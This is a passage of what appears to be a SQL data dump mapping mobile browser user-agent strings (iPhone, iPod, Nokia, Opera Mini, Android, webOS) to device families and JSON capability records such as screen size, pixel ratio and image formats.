Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 6 like Mac OS X)','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 6 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 6 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 7 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 7 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 8 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 8 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU iPhone OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) YaApp_iOS/* YaApp_iOS_Browser/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPhone; CPU like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_iphone','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 10 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 13 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 14 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 8 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod touch; CPU iPhone OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod; CPU iPhone OS 12 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod; CPU iPhone OS 4 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod; CPU iPhone OS 5 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod; CPU iPhone OS 6 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (iPod; CPU iPhone OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','apple_ipod','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (webOS/1.4) AppleWebKit/* (KHTML, like Gecko) Safari/* Pre/1.1','webos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0(Linux/3.4; Android 4.*; Lenovo A536) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0(Linux; Android 4.*; Fly_IQ442_Quad) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.1 (Linux; Android 5.*; ZTE Blade A460) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/6.0 (Linux; Android 6.*; Bmobile_AX705) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozzila/5.0 (Linux; Android 4.*; Fly IQ449) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozzila/5.0(Linux;Android 4.*;Fly IQ4601) AppleWebKit/*(KHTML, like Gecko) Mobile Safari/*','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(MRE_VER_2202;240X320;MT6236;V/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(MRE_VER_2202;240X320;MT6276;T/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(MRE_VER_2202;240X320;MT6276;V/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(MRE_VER_2500;220X176;MT6255;A/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":220,\"screenHeight\":176,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(MRE_VER_3000;240X320;MT6255;V/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(MTK/Unknown;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(Spreadtrum/HW Version: SC6531CA_BAR;Native Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(Spreadtrum/HW Version: SC6531_BAR;Native Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(Spreadtrum/HW Version: SC6531_OPENPHONE;Native Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(Spreadtrum/HW Version: fp6531_bar;Native Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(Spreadtrum/HW Version: sc7701_barphone;Native Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(Spreadtrum/HW Version: sc7701_sp7701_HTXPA18;Native Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":230,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(Spreadtrum/Unknown;Native Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(TECNOT605/wap2.0/240x320/key;/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(TECNOT611/wap2.0/240x320/key;/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('NativeOperaMini(TECNOT612/wap2.0/240x320/key;/;Opera Mini)','opera_native','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('News Republic/5.4 (Linux; Android 24) Mobile Safari','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('News Republic/5.4 (Linux; Android 25) Mobile Safari','android','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia112 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia113 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia200 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia201 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia203 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia205 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia206 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia206.1 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia210.2 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia210.4 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia210.5 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia2220s Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":120,\"screenHeight\":130,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia2330c-2','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":128,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia2330c-2 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":120,\"screenHeight\":130,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia2690','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":122,\"screenHeight\":160,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia2690 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":120,\"screenHeight\":130,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia2700c-2','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia2700c-2 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":224,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia2710c-2 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":228,\"screenHeight\":280,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia2730c-1/09.41','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":234,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia300 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia301 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia302 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia302 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia302/14.26','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia303 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia305 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia308 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia310 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia311 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia3710fold','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia501 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia503s Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia5130c-2','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia5130c-2 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia515.2 Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6120c Series60/* Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6131','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":218,\"screenHeight\":300,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6151 Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":118,\"screenHeight\":128,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6233 Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":218,\"screenHeight\":300,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6280 Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":218,\"screenHeight\":211,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6300 Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":218,\"screenHeight\":300,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6303classic','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia6303classic Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6303iclassic Profile/MIDP-2.1 Configuration/CLDC-1.1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia6303iclassic Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) Safari/*','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6303iclassic/07.10','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":234,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia6303iclassic/09.83','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":234,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia6303iclassic/10.80','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":234,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia6680 SymbianOS/* Series60/* Profile/MIDP-2.0 Configuration/CLDC-1.1','nokia60','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":168,\"screenHeight\":188,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Nokia6700c-1','nokia','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Nokia6700c-1 Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko) 